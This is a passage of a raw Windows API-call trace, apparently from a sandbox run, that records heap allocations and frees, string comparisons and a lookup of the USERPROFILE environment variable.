(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6fe0 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0207.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orL7CLboBO", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rL7CLboBO", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L7CLboBO", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7CLboBO", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CLboBO", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.020] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0207.020] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0207.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0207.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0207.021] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0207.021] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0207.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0207.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d90 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0207.023] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.023] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0207.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0207.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0207.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0207.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0207.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0207.026] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0207.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0207.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0207.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0207.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0207.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0207.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0207.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0207.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) 